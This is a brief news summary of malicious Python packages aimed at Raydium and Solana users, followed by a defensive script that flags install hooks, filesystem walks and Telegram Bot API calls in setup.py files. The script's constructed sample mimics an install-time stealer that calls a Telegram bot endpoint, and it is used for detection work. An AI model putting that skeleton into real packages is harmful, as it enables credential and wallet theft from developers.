Upon installation, this code would execute automatically, compromising victims' systems, exfiltrating data, and draining crypto wallets, Checkmarx researchers reported.
The rogue Python packages targeted Raydium and Solana users, concealing advanced malware designed to steal various kinds of sensitive data and grant threat actors remote access.
Malicious packages disguised their behavior by listing legitimate dependencies, highlighting the need for enhanced security measures in software development.
The malware exfiltrated data to Telegram bots, captured system screenshots, searched for sensitive files, and established backdoor access for long-term compromise.
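The install-time execution, filesystem search and Telegram exfiltration described above can be triaged statically before a package is ever installed. The following is an added example (not Checkmarx's tooling and not code from the reported packages); the sample setup.py it inspects is constructed for illustration and is only parsed, never executed.

```python
import ast
import re

# Constructed sample setup.py that mimics the reported pattern: a custom
# install command (runs at `pip install`), a home-directory walk, and a
# Telegram Bot API call, next to legitimate-looking dependencies.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        for root, dirs, files in os.walk(os.path.expanduser("~")):
            pass
        urllib.request.urlopen("https://api.telegram.org/bot<TOKEN>/sendDocument")

setup(name="example-pkg",
      install_requires=["requests", "solana"],
      cmdclass={"install": PostInstall})
'''

# setuptools command classes whose run() executes during install/build
HOOK_BASES = {"install", "develop", "egg_info", "build_py"}
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot")


def _name(node):
    """Bare identifier for a Name or Attribute node, '' otherwise."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return node.attr
    return ""


def triage_setup_py(source: str) -> list[str]:
    """Return human-readable findings for a setup.py; empty list means nothing flagged."""
    findings = []
    tree = ast.parse(source)  # static parse only; the script is never run
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            hooked = {_name(b) for b in node.bases} & HOOK_BASES
            if hooked and any(isinstance(m, ast.FunctionDef) and m.name == "run" for m in node.body):
                findings.append(f"class {node.name} overrides run() of {sorted(hooked)}: code runs at pip install")
        elif isinstance(node, ast.Call) and _name(node.func) == "walk" \
                and _name(getattr(node.func, "value", None)) == "os":
            findings.append(f"os.walk() at line {node.lineno}: filesystem enumeration in a build script")
    if TELEGRAM_RE.search(source):
        findings.append("Telegram Bot API endpoint referenced: possible exfiltration channel")
    return findings


if __name__ == "__main__":
    for finding in triage_setup_py(SAMPLE_SETUP_PY):
        print("FLAG:", finding)
```

A clean setup.py that only calls setup() with install_requires produces no findings, which is the point: the dependency list itself is not the signal, the install hook and its side effects are.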